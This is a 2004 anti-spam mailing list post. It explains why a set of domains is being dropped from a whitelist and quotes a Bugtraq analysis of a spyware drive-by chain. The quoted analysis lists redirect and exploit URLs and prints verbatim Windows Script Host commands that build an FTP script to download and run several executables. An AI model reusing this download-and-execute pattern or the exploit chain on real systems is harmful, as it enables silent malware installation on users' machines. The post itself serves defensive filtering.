[SURBL-Discuss] Need help checking FP list from Theo
Jeff Chan
jeffc at surbl.org
Tue Sep 7 08:36:28 CEST 2004
My bad, I inadvertently included a message which was about
trojan-like spyware, which is publically avialable at:
http://seclists.org/lists/bugtraq/2004/May/0153.html
> http://65.17.207.40/framepb_1u.php
>
> which redirects to
>
> http://si1.default-homepage-network.com/180/180.htm?si-001
>
> which redirects to
>
> http://object.passthison.com/vu083003/object.cgi?si1
>
> which uses the Object Data vulnerability to change your startpage to
>
> http://default-homepage-network.com/start.cgi?hkcu
>
> the parameter at the end is either HKCU or HKLM depending on what
> registry branch lead you there. This serves to notify
> default-homepage-network whether your machine has been compromised with
> user or administrator privileges
>
> start.cgi also opens a few popup windows with advertisements, after
> which it opens the following page=20
>
> http://default-homepage-network.com/newspynotice.html
>
> that wants to sell you a cure against spyware which hijacks your start
> page - as theirs just did.
>
> That page also secretly opens
>
> http://object.passthison.com/vu083003/newobject1.cgi
> http://69.50.139.61/hp1/hp1.htm
> http://www.achtungachtung.com/0021/index.php
>
> newobject1.cgi executes the following commands through the Windows
> Script Host object:
>
> wsh.Run('command /C echo open
> downloads.default-homepage-network.com>o',false,6);
> wsh.Run('command /C echo tmpacct>>o',false,6);
> wsh.Run('command /C echo 12345>>o',false,6);
> wsh.Run('command /C echo bin>>o',false,6);
> wsh.Run('command /C echo get install2.exe>>o',false,6);
> wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6);
> wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
> wsh.Run('command /C echo get CS4P028.exe>>o',false,6);
> wsh.Run('command /C echo bye>>o',false,6);
> wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o
>>o.bat',false,6);
> wsh.Run('command /C echo if exist install2.exe install2.exe
>>>o.bat',false,6);
> wsh.Run('command /C echo if exist infamous_downloader.exe
> infamous_downloader.exe >>o.bat',false,6);
> wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
>>>o.bat',false,6);
> wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe
>>>o.bat',false,6);
> wsh.Run('command /C o.bat',false,6);
>
> Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch
> http://69.50.139.61/hp1/HP1.chm::/hp1.htm
>
> framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which
> uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
>
> Other files that are attempted to be delivered are
>
> http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
> http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
> http://validation-required.info/
> http://www.popmoney.net/ip/index.php
> http://www.portalone.hostance.com.com/italia.exe
Therefore I am taking all those domais out of the possible
whitelist.
Jeff C.
More information about the Discuss
mailing list